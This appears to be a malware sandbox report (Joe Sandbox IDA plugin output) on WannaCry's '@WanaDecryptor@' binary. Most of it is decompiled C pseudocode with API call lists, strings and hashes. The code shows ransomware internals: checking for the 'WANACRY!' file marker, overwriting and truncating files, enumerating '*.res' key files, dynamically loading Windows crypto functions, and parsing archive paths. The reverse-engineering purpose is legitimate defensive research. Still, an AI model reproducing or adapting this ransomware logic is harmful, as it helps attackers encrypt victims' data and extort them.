                                  																				__eflags = _t145;
                                  																				if(_t145 == 0) {
                                  																					goto L32;
                                  																				} else {
                                  																					__eflags = _v32 - _v36;
                                  																					if(_v32 == _v36) {
                                  																						continue;
                                  																					} else {
                                  																						goto L32;
                                  																					}
                                  																				}
                                  																			}
                                  																		}
                                  																	} else {
                                  																		__eflags =  *_t139;
                                  																		if( *_t139 != 0) {
                                  																			goto L32;
                                  																		} else {
                                  																			goto L28;
                                  																		}
                                  																	}
                                  																} else {
                                  																	__eflags = _v44;
                                  																	if(_v44 <= 0) {
                                  																		break;
                                  																	} else {
                                  																		goto L26;
                                  																	}
                                  																}
                                  																goto L41;
                                  															}
                                  															_push(0);
                                  															SetFilePointerEx(_t216, _v572, _v568, 0);
                                  															SetEndOfFile(_t216);
                                  															goto L36;
                                  														} else {
                                  															_push( &_v48);
                                  															_push( &_v560);
                                  															_t56 = _t223 + 0x2c; // 0x2c
                                  															_t148 = E00404AF0(_t56,  *(_t223 + 0x4c8), _v616);
                                  															__eflags = _t148;
                                  															if(_t148 != 0) {
                                  																_v564 = 1;
                                  																goto L22;
                                  															} else {
                                  																goto L20;
                                  															}
                                  														}
                                  													} else {
                                  														_push(_t119);
                                  														_push( &_v20);
                                  														goto L33;
                                  													}
                                  												} else {
                                  													CloseHandle(_t159);
                                  													_t159 = CreateFileW(_a4, 0xc0000000, 1, 0, 3, 0, 0);
                                  													_v620 = _t159;
                                  													__eflags = _t159 - 0xffffffff;
                                  													if(_t159 == 0xffffffff) {
                                  														goto L32;
                                  													} else {
                                  														SetFilePointer(_t159, 0xffff0000, 0, 2);
                                  														_t152 = ReadFile(_t159,  *(_t223 + 0x4c8), 0x10000,  &_v36, 0);
                                  														__eflags = _t152;
                                  														if(_t152 == 0) {
                                  															goto L32;
                                  														} else {
                                  															__eflags = _v36 - 0x10000;
                                  															if(_v36 != 0x10000) {
                                  																goto L32;
                                  															} else {
                                  																SetFilePointer(_t159, 0, 0, 0);
                                  																_t155 = WriteFile(_t159,  *(_t223 + 0x4c8), 0x10000,  &_v32, 0);
                                  																__eflags = _t155;
                                  																if(_t155 == 0) {
                                  																	L20:
                                  																	_push(0xffffffff);
                                  																	_push( &_v20);
                                  																	goto L33;
                                  																} else {
                                  																	__eflags = _v32 - 0x10000;
                                  																	if(_v32 != 0x10000) {
                                  																		goto L20;
                                  																	} else {
                                  																		SetFilePointer(_t159, 0xffff0000, 0, 2);
                                  																		SetEndOfFile(_t159);
                                  																		_t216 = _v608;
                                  																		L36:
                                  																		SetFileTime(_t216,  &_v604,  &_v596,  &_v588);
                                  																		__eflags = _v612 - 3;
                                  																		if(_v612 == 3) {
                                  																			_t137 = CloseHandle(_t159) | 0xffffffff;
                                  																			__eflags = _t137;
                                  																			_v608 = _t137;
                                  																			_v620 = _t137;
                                  																			MoveFileW(_a4, _a8);
                                  																		}
                                  																		_t224 =  *(_t223 + 0x4d4);
                                  																		__eflags = _t224;
                                  																		if(_t224 != 0) {
                                  																			 *_t224(_a4, _a8, _v568, _v572, 0, _v564);
                                  																		}
                                  																		_push(0xffffffff);
                                  																		_push( &_v20);
                                  																		L00413056();
                                  																		 *[fs:0x0] = _v20;
                                  																		return 1;
                                  																	}
                                  																}
                                  															}
                                  														}
                                  													}
                                  												}
                                  											}
                                  										}
                                  									}
                                  								}
                                  							}
                                  						}
                                  					}
                                  				} else {
                                  					_push(_t213);
                                  					_push( &_v20);
                                  					L33:
                                  					L00413056();
                                  					 *[fs:0x0] = _v20;
                                  					return 0;
                                  				}
                                  				L41:
                                  			}

                                  APIs
                                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00402127
                                  • GetFileTime.KERNEL32(00000000,?,?,?), ref: 00402159
                                  • ReadFile.KERNEL32(00000000,00000000,00000008,?,00000000), ref: 0040216E
                                  • ReadFile.KERNEL32(00000000,?,00000004,?,00000000), ref: 004021A5
                                  • ReadFile.KERNEL32(00000000,?,00000100,?,00000000), ref: 004021DC
                                  • ReadFile.KERNEL32(00000000,?,00000004,?,00000000), ref: 004021FA
                                  • ReadFile.KERNEL32(00000000,?,00000008,?,00000000), ref: 00402218
                                  • CloseHandle.KERNEL32(00000000), ref: 00402234
                                  • CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000003,00000000,00000000), ref: 0040224D
                                  • SetFilePointer.KERNEL32(00000000,FFFF0000,00000000,00000002), ref: 00402274
                                  • ReadFile.KERNEL32(00000000,?,00010000,?,00000000), ref: 00402289
                                  • _local_unwind2.MSVCRT ref: 00402452
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$Read$Create$CloseHandlePointerTime_local_unwind2
                                  • String ID: WANACRY!
                                  • API String ID: 1586634678-1240840912
                                  • Opcode ID: 99468a7adf92e140f18bc92f45e5389bbb3b22b5213984f8d8d7e9952fbc0adf
                                  • Instruction ID: 3da7a8628a1c4a9b72cf23ccbc301ae3d1bdd94b5a24a93ab77a4db798f2c342
                                  • Opcode Fuzzy Hash: 99468a7adf92e140f18bc92f45e5389bbb3b22b5213984f8d8d7e9952fbc0adf
                                  • Instruction Fuzzy Hash: 91D14471A00214AFDB20DB64CC89FEBB7B8FB88710F14466AF619B61D0D7B49945CF68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 69%
                                  			E00403CB0(struct _WIN32_FIND_DATAA* __ecx) {
                                  				void* _t31;
                                  				int _t34;
                                  				int _t37;
                                  				intOrPtr _t39;
                                  				int _t42;
                                  				struct _WIN32_FIND_DATAA* _t54;
                                  				void* _t75;
                                  				struct _IO_FILE* _t76;
                                  				struct _WIN32_FIND_DATAA* _t79;
                                  				void* _t81;
                                  				void* _t82;
                                  				void* _t83;
                                  				void* _t84;
                                  
                                  				_t54 = __ecx;
                                  				_t79 = __ecx;
                                  				 *((intOrPtr*)(_t81 + 0xc)) = __ecx;
                                  				_t31 = FindFirstFileA("*.res", _t81 + 0xcc);
                                  				 *(_t81 + 8) = _t31;
                                  				if(_t31 != 0xffffffff) {
                                  					goto L3;
                                  					L14:
                                  					_t75 =  *(_t81 + 0x14);
                                  					_t54 = _t81 + 0xdc;
                                  					if(FindNextFileA(_t75, _t54) != 0) {
                                  						L3:
                                  						if(( *(_t81 + 0xdc) & 0x00000010) == 0) {
                                  							asm("repne scasb");
                                  							if( !(_t54 | 0xffffffff) - 1 == 0xc) {
                                  								_t34 = sscanf(_t81 + 0x108, "%08X.res", _t81 + 0x1c);
                                  								_t81 = _t81 + 0xc;
                                  								if(_t34 >= 1) {
                                  									_t76 = fopen(_t81 + 0x108, "rb");
                                  									_t81 = _t81 + 8;
                                  									 *(_t81 + 0x18) = _t76;
                                  									if(_t76 != 0) {
                                  										_t37 = fread(_t81 + 0x5c, 0x88, 1, _t76);
                                  										_t82 = _t81 + 0x10;
                                  										if(_t37 == 1) {
                                  											_t39 =  *((intOrPtr*)(_t82 + 0x1c));
                                  											_t60 =  *((intOrPtr*)(_t82 + 0x5c));
                                  											if( *((intOrPtr*)(_t82 + 0x5c)) == _t39) {
                                  												if(_t39 != 0) {
                                  													 *((char*)(_t82 + 0x21)) = 0x5c;
                                  													 *((char*)(_t82 + 0x28)) = 0x5c;
                                  													E00401C30(_t60, _t39, _t82 + 0x22);
                                  													_t83 = _t82 + 8;
                                  													_push(_t83 + 0x20);
                                  													_push(0);
                                  													_push(0x143);
                                  												} else {
                                  													sprintf(_t82 + 0x20, "My Computer");
                                  													_t83 = _t82 + 8;
                                  													_push(_t83 + 0x20);
                                  													_push(0);
                                  													_push(0x14a);
                                  												}
                                  												_t42 = SendMessageA( *(_t79 + 0xc0), ??, ??, ??);
                                  												_push(0x88);
                                  												L00412CEC();
                                  												_t84 = _t83 + 4;
                                  												memcpy(_t42, _t84 + 0x54, 0x22 << 2);
                                  												_t82 = _t84 + 0xc;
                                  												SendMessageA( *( *((intOrPtr*)(_t83 + 0x14)) + 0xc0), 0x151, _t42, _t42);
                                  												_t76 =  *(_t82 + 0x18);
                                  												_t79 =  *((intOrPtr*)(_t82 + 0x10));
                                  											}
                                  										}
                                  										fclose(_t76);
                                  										_t81 = _t82 + 4;
                                  									}
                                  								}
                                  							}
                                  						}
                                  						goto L14;
                                  					} else {
                                  						FindClose(_t75);
                                  						return 1;
                                  					}
                                  				} else {
                                  					return 0;
                                  				}
                                  			}

















                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$FileMessageSend$#823CloseFirstNextfclosefopenfreadsprintfsscanf
                                  • String ID: %08X.res$*.res$My Computer$\$\
                                  • API String ID: 1476605332-298172004
                                  • Opcode ID: 7cb988677e937bd58c99c4df6902c5c20c027946b77c77249284c9a5f5064ae7
                                  • Instruction ID: 8c176cb2dc152f679f03352499a178afa0a04d74b0fbd326e0cc20a81f44b8b1
                                  • Opcode Fuzzy Hash: 7cb988677e937bd58c99c4df6902c5c20c027946b77c77249284c9a5f5064ae7
                                  • Instruction Fuzzy Hash: F741C671508300ABE710CB54DC45FEB7799EFC4715F404A2DF984A62C1E7B8EA498B9A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00404B70() {
                                  				_Unknown_base(*)()* _t9;
                                  				struct HINSTANCE__* _t20;
                                  
                                  				if( *0x4217c0 == 0) {
                                  					_t20 = LoadLibraryA("advapi32.dll");
                                  					if(_t20 == 0) {
                                  						L10:
                                  						return 0;
                                  					} else {
                                  						 *0x4217c0 = GetProcAddress(_t20, "CryptAcquireContextA");
                                  						 *0x4217c4 = GetProcAddress(_t20, "CryptImportKey");
                                  						 *0x4217c8 = GetProcAddress(_t20, "CryptDestroyKey");
                                  						 *0x4217cc = GetProcAddress(_t20, "CryptEncrypt");
                                  						 *0x4217d0 = GetProcAddress(_t20, "CryptDecrypt");
                                  						_t9 = GetProcAddress(_t20, "CryptGenKey");
                                  						 *0x4217d4 = _t9;
                                  						if( *0x4217c0 == 0 ||  *0x4217c4 == 0 ||  *0x4217c8 == 0 ||  *0x4217cc == 0 ||  *0x4217d0 == 0 || _t9 == 0) {
                                  							goto L10;
                                  						} else {
                                  							return 1;
                                  						}
                                  					}
                                  				} else {
                                  					return 1;
                                  				}
                                  			}






                                  APIs
                                  • LoadLibraryA.KERNEL32(advapi32.dll,?,00402C46), ref: 00404B86
                                  • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 00404BA3
                                  • GetProcAddress.KERNEL32(00000000,CryptImportKey), ref: 00404BB0
                                  • GetProcAddress.KERNEL32(00000000,CryptDestroyKey), ref: 00404BBD
                                  • GetProcAddress.KERNEL32(00000000,CryptEncrypt), ref: 00404BCA
                                  • GetProcAddress.KERNEL32(00000000,CryptDecrypt), ref: 00404BD7
                                  • GetProcAddress.KERNEL32(00000000,CryptGenKey), ref: 00404BE4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: CryptAcquireContextA$CryptDecrypt$CryptDestroyKey$CryptEncrypt$CryptGenKey$CryptImportKey$advapi32.dll
                                  • API String ID: 2238633743-2459060434
                                  • Opcode ID: 76a5095adcaff83da50827021ea7e3f960384e315c05d83dddbeb63d2a682abb
                                  • Instruction ID: 00e3496518ad86b0ae3e163ac91477e164a9cb94f9785d2b2dfdbbcf4affa7e0
                                  • Opcode Fuzzy Hash: 76a5095adcaff83da50827021ea7e3f960384e315c05d83dddbeb63d2a682abb
                                  • Instruction Fuzzy Hash: 441182B074635196D738AB67FD14AA726D4EFE1B01B85053BE401D3AB0C7B888028A9C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 87%
                                  			E004080C0(intOrPtr __ecx) {
                                  				void _v999;
                                  				char _v1000;
                                  				void* _v1012;
                                  				char _v1100;
                                  				char _v1200;
                                  				char _v1476;
                                  				signed char _v1520;
                                  				intOrPtr _v1648;
                                  				void _v1656;
                                  				intOrPtr _v1660;
                                  				intOrPtr _v1664;
                                  				intOrPtr _v1668;
                                  				intOrPtr _v1672;
                                  				intOrPtr _v1696;
                                  				void _v1788;
                                  				void _v1792;
                                  				void* _v1796;
                                  				char _v1800;
                                  				intOrPtr _v1804;
                                  				intOrPtr _v1808;
                                  				void* _v1820;
                                  				char _t44;
                                  				void* _t47;
                                  				void* _t50;
                                  				void* _t54;
                                  				int _t57;
                                  				int _t60;
                                  				int _t62;
                                  				struct _WIN32_FIND_DATAA* _t74;
                                  				intOrPtr _t103;
                                  				void* _t104;
                                  				struct _IO_FILE* _t105;
                                  				void* _t110;
                                  				intOrPtr _t113;
                                  				void* _t114;
                                  				void* _t126;
                                  
                                  				_t103 = __ecx;
                                  				memset( &_v1788, 0, 0x21 << 2);
                                  				_t44 =  *0x421798; // 0x0
                                  				_v1000 = _t44;
                                  				_v1808 = _t103;
                                  				memset( &_v999, 0, 0xf9 << 2);
                                  				_t110 =  &_v1808 + 0x18;
                                  				asm("stosw");
                                  				_t74 =  &_v1520;
                                  				_v1804 = 0;
                                  				asm("stosb");
                                  				_t47 = FindFirstFileA("*.res", _t74);
                                  				_v1796 = _t47;
                                  				if(_t47 == 0xffffffff) {
                                  					L13:
                                  					_push(_v1804);
                                  					_t50 = E00401E30(_t124, _t126, _v1672,  &_v1200);
                                  					sprintf( &_v1000, "---\t%s\t%s\t%d\t%I64d\t%d", E00401E30(_t124, _t126, _v1696,  &_v1100), _t50, _v1668, _v1664, _v1660);
                                  					_t113 = _t110 + 0x30;
                                  					_push(0);
                                  					_v1808 = _t113;
                                  					L00412CAA();
                                  					_t79 = _t103;
                                  					_t54 = E004082C0(_t103,  &_v1000,  &_v1000);
                                  					if(_t54 != 0xffffffff) {
                                  						return _t54;
                                  					}
                                  					_push(0);
                                  					 *((intOrPtr*)(_t113 + 0x18)) = _t113;
                                  					L00412CAA();
                                  					return E004082C0(_t103, _t113 + 0x340, _t79);
                                  				} else {
                                  					goto L2;
                                  					L11:
                                  					_t104 = _v1796;
                                  					_t74 =  &_v1520;
                                  					_t57 = FindNextFileA(_t104, _t74);
                                  					_t124 = _t57;
                                  					if(_t57 != 0) {
                                  						L2:
                                  						if((_v1520 & 0x00000010) == 0) {
                                  							asm("repne scasb");
                                  							if( !(_t74 | 0xffffffff) - 1 == 0xc) {
                                  								_t60 = sscanf( &_v1476, "%08X.res",  &_v1800);
                                  								_t110 = _t110 + 0xc;
                                  								if(_t60 >= 1) {
                                  									_t105 = fopen( &_v1476, "rb");
                                  									_t110 = _t110 + 8;
                                  									if(_t105 != 0) {
                                  										_t62 = fread( &_v1656, 0x88, 1, _t105);
                                  										_t114 = _t110 + 0x10;
                                  										if(_t62 == 1 && _v1648 == _v1800) {
                                  											_v1804 = _v1804 + 1;
                                  										}
                                  										fclose(_t105);
                                  										_t110 = _t114 + 4;
                                  										if(_v1648 == 0) {
                                  											memcpy( &_v1792,  &_v1656, 0x22 << 2);
                                  											_t110 = _t110 + 0xc;
                                  										}
                                  									}
                                  								}
                                  							}
                                  						}
                                  						goto L11;
                                  					} else {
                                  						FindClose(_t104);
                                  						_t103 = _v1808;
                                  						goto L13;
                                  					}
                                  				}
                                  			}








































                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$#537File$CloseFirstNextfclosefopenfreadsprintfsscanf
                                  • String ID: %08X.res$*.res$---%s%s%d%I64d%d
                                  • API String ID: 1530363904-2310201135
                                  • Opcode ID: 246f558812f6a4b1f5d00500c0ea839226a98d7eebb8d8b9e36566a9c1167d01
                                  • Instruction ID: f4d275e2d06bc6c2fe64a46714bc06f3fac9236f3415a442fab0096444624429
                                  • Opcode Fuzzy Hash: 246f558812f6a4b1f5d00500c0ea839226a98d7eebb8d8b9e36566a9c1167d01
                                  • Instruction Fuzzy Hash: F051B370604740ABD634CB24DD45BEF77E9EFC4314F00492EF98897291DB78AA098B9A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 91%
                                  			E00411CF0(intOrPtr* __ecx) {
                                  				intOrPtr _t142;
                                  				signed int _t147;
                                  				signed int _t149;
                                  				intOrPtr _t150;
                                  				void* _t152;
                                  				signed int _t157;
                                  				signed int _t160;
                                  				unsigned int _t162;
                                  				signed char _t164;
                                  				struct _FILETIME _t177;
                                  				struct _FILETIME _t180;
                                  				intOrPtr _t182;
                                  				signed int _t186;
                                  				signed char _t188;
                                  				struct _FILETIME _t204;
                                  				struct _FILETIME _t212;
                                  				signed int _t215;
                                  				signed int _t217;
                                  				signed int _t219;
                                  				intOrPtr* _t226;
                                  				signed int _t231;
                                  				signed int _t232;
                                  				signed int _t234;
                                  				signed int _t235;
                                  				signed int _t239;
                                  				unsigned int _t248;
                                  				signed int _t249;
                                  				int _t252;
                                  				signed char _t264;
                                  				intOrPtr _t269;
                                  				intOrPtr* _t273;
                                  				signed int _t276;
                                  				unsigned int _t297;
                                  				signed int _t299;
                                  				intOrPtr _t300;
                                  				signed int _t303;
                                  				intOrPtr _t307;
                                  				intOrPtr _t309;
                                  				signed int _t311;
                                  				intOrPtr _t312;
                                  				intOrPtr _t313;
                                  				intOrPtr* _t321;
                                  				signed int _t329;
                                  				intOrPtr* _t336;
                                  				void* _t337;
                                  				void* _t338;
                                  				signed int _t340;
                                  				signed int _t341;
                                  				void* _t343;
                                  				void* _t346;
                                  				void* _t348;
                                  				void* _t349;
                                  				void* _t350;
                                  				void* _t351;
                                  				void* _t353;
                                  				void* _t354;
                                  				void* _t355;
                                  				void* _t356;
                                  
                                  				_t312 =  *((intOrPtr*)(_t348 + 0x294));
                                  				_t232 = _t231 | 0xffffffff;
                                  				_t336 = __ecx;
                                  				 *((intOrPtr*)(_t348 + 0x1c)) = __ecx;
                                  				if(_t312 < _t232) {
                                  					L72:
                                  					return 0x10000;
                                  				} else {
                                  					_t140 =  *__ecx;
                                  					if(_t312 >=  *((intOrPtr*)( *__ecx + 4))) {
                                  						goto L72;
                                  					} else {
                                  						if( *((intOrPtr*)(__ecx + 4)) != _t232) {
                                  							E00411AC0(_t140);
                                  							_t348 = _t348 + 4;
                                  						}
                                  						 *(_t336 + 4) = _t232;
                                  						if(_t312 !=  *((intOrPtr*)(_t336 + 0x134))) {
                                  							__eflags = _t312 - _t232;
                                  							if(_t312 != _t232) {
                                  								_t142 =  *_t336;
                                  								__eflags = _t312 -  *((intOrPtr*)(_t142 + 0x10));
                                  								if(_t312 <  *((intOrPtr*)(_t142 + 0x10))) {
                                  									E00411390(_t142);
                                  									_t348 = _t348 + 4;
                                  								}
                                  								_t143 =  *_t336;
                                  								__eflags =  *( *_t336 + 0x10) - _t312;
                                  								while(__eflags < 0) {
                                  									E004113E0(_t143);
                                  									_t143 =  *_t336;
                                  									_t348 = _t348 + 4;
                                  									__eflags =  *( *_t336 + 0x10) - _t312;
                                  								}
                                  								E00411350( *_t336, _t348 + 0x4c, _t348 + 0x98, 0x104, 0, 0, 0, 0);
                                  								_t147 = E00411460(__eflags,  *_t336, _t348 + 0x58, _t348 + 0x40, _t348 + 0x30);
                                  								_t349 = _t348 + 0x30;
                                  								__eflags = _t147;
                                  								if(_t147 == 0) {
                                  									_t149 = E00410A50( *((intOrPtr*)( *_t336)),  *((intOrPtr*)(_t349 + 0x20)), 0);
                                  									_t350 = _t349 + 0xc;
                                  									__eflags = _t149;
                                  									if(_t149 == 0) {
                                  										_t150 =  *((intOrPtr*)(_t350 + 0x10));
                                  										_push(_t150);
                                  										L00412CEC();
                                  										_t313 = _t150;
                                  										 *((intOrPtr*)(_t350 + 0x1c)) = _t313;
                                  										_t152 = E00410AF0(_t313, 1,  *((intOrPtr*)(_t350 + 0x14)),  *((intOrPtr*)( *_t336)));
                                  										_t351 = _t350 + 0x14;
                                  										__eflags = _t152 -  *((intOrPtr*)(_t350 + 0x24));
                                  										if(_t152 ==  *((intOrPtr*)(_t350 + 0x24))) {
                                  											_t346 =  *(_t351 + 0x29c);
                                  											asm("repne scasb");
                                  											_t248 =  !_t232;
                                  											 *_t346 =  *( *_t336 + 0x10);
                                  											_t337 = _t351 + 0x88 - _t248;
                                  											_t249 = _t248 >> 2;
                                  											_t252 = memcpy(_t351 + 0x190, _t337, _t249 << 2) & 0x00000003;
                                  											__eflags = _t252;
                                  											memcpy(_t337 + _t249 + _t249, _t337, _t252);
                                  											_t353 = _t351 + 0x18;
                                  											_t321 = _t353 + 0x190;
                                  											while(1) {
                                  												_t157 =  *_t321;
                                  												__eflags = _t157;
                                  												if(_t157 == 0) {
                                  													goto L23;
                                  												}
                                  												L21:
                                  												__eflags =  *((intOrPtr*)(_t321 + 1)) - 0x3a;
                                  												if( *((intOrPtr*)(_t321 + 1)) == 0x3a) {
                                  													_t321 = _t321 + 2;
                                  													while(1) {
                                  														_t157 =  *_t321;
                                  														__eflags = _t157;
                                  														if(_t157 == 0) {
                                  															goto L23;
                                  														}
                                  														goto L21;
                                  													}
                                  												}
                                  												L23:
                                  												__eflags = _t157 - 0x5c;
                                  												if(_t157 == 0x5c) {
                                  													_t321 = _t321 + 1;
                                  													while(1) {
                                  														_t157 =  *_t321;
                                  														__eflags = _t157;
                                  														if(_t157 == 0) {
                                  															goto L23;
                                  														}
                                  														goto L21;
                                  													}
                                  												}
                                  												__eflags = _t157 - 0x2f;
                                  												if(_t157 == 0x2f) {
                                  													_t321 = _t321 + 1;
                                  													while(1) {
                                  														_t157 =  *_t321;
                                  														__eflags = _t157;
                                  														if(_t157 == 0) {
                                  															goto L23;
                                  														}
                                  														goto L21;
                                  													}
                                  												}
                                  												_push("\\..\\");
                                  												_push(_t321);
                                  												L004132C4();
                                  												_t353 = _t353 + 8;
                                  												__eflags = _t157;
                                  												if(_t157 != 0) {
                                  													_t41 = _t157 + 4; // 0x4
                                  													_t321 = _t41;
                                  													while(1) {
                                  														_t157 =  *_t321;
                                  														__eflags = _t157;
                                  														if(_t157 == 0) {
                                  															goto L23;
                                  														}
                                  														goto L21;
                                  													}
                                  												}
                                  												_push("\\../");
                                  												_push(_t321);
                                  												L004132C4();
                                  												_t353 = _t353 + 8;
                                  												__eflags = _t157;
                                  												if(_t157 != 0) {
                                  													_t42 = _t157 + 4; // 0x4
                                  													_t321 = _t42;
                                  													while(1) {
                                  														_t157 =  *_t321;
                                  														__eflags = _t157;
                                  														if(_t157 == 0) {
                                  															goto L23;
                                  														}
                                  														goto L21;
                                  													}
                                  												}
                                  												_push("/../");
                                  												_push(_t321);
                                  												L004132C4();
                                  												_t353 = _t353 + 8;
                                  												__eflags = _t157;
                                  												if(_t157 != 0) {
                                  													_t43 = _t157 + 4; // 0x4
                                  													_t321 = _t43;
                                  													while(1) {
                                  														_t157 =  *_t321;
                                  														__eflags = _t157;
                                  														if(_t157 == 0) {
                                  															goto L23;
                                  														}
                                  														goto L21;
                                  													}
                                  													goto L23;
                                  												}
                                  												_push("/..\\");
                                  												_push(_t321);
                                  												L004132C4();
                                  												_t353 = _t353 + 8;
                                  												__eflags = _t157;
                                  												if(_t157 != 0) {
                                  													_t44 = _t157 + 4; // 0x4
                                  													_t321 = _t44;
                                  													continue;
                                  												}
                                  												asm("repne scasb");
                                  												_t338 = _t321 -  !0xffffffff;
                                  												_t297 =  *(_t353 + 0x70);
                                  												_t160 = memcpy(_t346 + 4, _t338,  !0xffffffff >> 2 << 2);
                                  												_t354 = _t353 + 0xc;
                                  												 *((char*)(_t354 + 0x13)) = 0;
                                  												_t162 = memcpy(_t338 + 0x175b75a, _t338, _t160 & 0x00000003);
                                  												_t355 = _t354 + 0xc;
                                  												_t164 = _t162 >> 0x0000001e & 0x00000001;
                                  												_t264 =  !(_t297 >> 0x17) & 0x00000001;
                                  												_t340 =  *(_t355 + 0x3c) >> 8;
                                  												__eflags = _t340;
                                  												 *(_t355 + 0x12) = 0;
                                  												_t234 = 1;
                                  												if(_t340 == 0) {
                                  													L39:
                                  													_t264 = _t297 & 0x00000001;
                                  													 *(_t355 + 0x13) = _t297 >> 0x00000001 & 0x00000001;
                                  													 *(_t355 + 0x12) = _t297 >> 0x00000002 & 0x00000001;
                                  													_t164 = _t297 >> 0x00000004 & 0x00000001;
                                  													_t299 = _t297 >> 0x00000005 & 0x00000001;
                                  													__eflags = _t299;
                                  													_t234 = _t299;
                                  												} else {
                                  													__eflags = _t340 - 7;
                                  													if(_t340 == 7) {
                                  														goto L39;
                                  													} else {
                                  														__eflags = _t340 - 0xb;
                                  														if(_t340 == 0xb) {
                                  															goto L39;
                                  														} else {
                                  															__eflags = _t340 - 0xe;
                                  															if(_t340 == 0xe) {
                                  																goto L39;
                                  															}
                                  														}
                                  													}
                                  												}
                                  												_t341 = 0;
                                  												__eflags = _t164;
                                  												 *(_t346 + 0x108) = 0;
                                  												if(_t164 != 0) {
                                  													 *(_t346 + 0x108) = 0x10;
                                  												}
                                  												__eflags = _t234;
                                  												if(_t234 != 0) {
                                  													_t219 =  *(_t346 + 0x108) | 0x00000020;
                                  													__eflags = _t219;
                                  													 *(_t346 + 0x108) = _t219;
                                  												}
                                  												__eflags =  *(_t355 + 0x13);
                                  												if( *(_t355 + 0x13) != 0) {
                                  													_t217 =  *(_t346 + 0x108) | 0x00000002;
                                  													__eflags = _t217;
                                  													 *(_t346 + 0x108) = _t217;
                                  												}
                                  												__eflags = _t264;
                                  												if(_t264 != 0) {
                                  													_t215 =  *(_t346 + 0x108) | 0x00000001;
                                  													__eflags = _t215;
                                  													 *(_t346 + 0x108) = _t215;
                                  												}
                                  												__eflags =  *(_t355 + 0x12);
                                  												if( *(_t355 + 0x12) != 0) {
                                  													_t63 = _t346 + 0x108;
                                  													 *_t63 =  *(_t346 + 0x108) | 0x00000004;
                                  													__eflags =  *_t63;
                                  												}
                                  												_t300 =  *((intOrPtr*)(_t355 + 0x58));
                                  												 *((intOrPtr*)(_t346 + 0x124)) =  *((intOrPtr*)(_t355 + 0x54));
                                  												 *((intOrPtr*)(_t346 + 0x128)) = _t300;
                                  												_t177 = E00411B80( *(_t355 + 0x4c) >> 0x10,  *(_t355 + 0x4c));
                                  												_t356 = _t355 + 8;
                                  												 *(_t356 + 0x30) = _t177;
                                  												 *((intOrPtr*)(_t356 + 0x3c)) = _t300;
                                  												LocalFileTimeToFileTime(_t356 + 0x30, _t356 + 0x28);
                                  												_t180 =  *(_t356 + 0x28);
                                  												_t269 =  *((intOrPtr*)(_t356 + 0x2c));
                                  												 *(_t346 + 0x10c) = _t180;
                                  												 *(_t346 + 0x114) = _t180;
                                  												 *(_t346 + 0x11c) = _t180;
                                  												__eflags =  *((intOrPtr*)(_t356 + 0x14)) - 4;
                                  												 *((intOrPtr*)(_t346 + 0x110)) = _t269;
                                  												 *((intOrPtr*)(_t346 + 0x118)) = _t269;
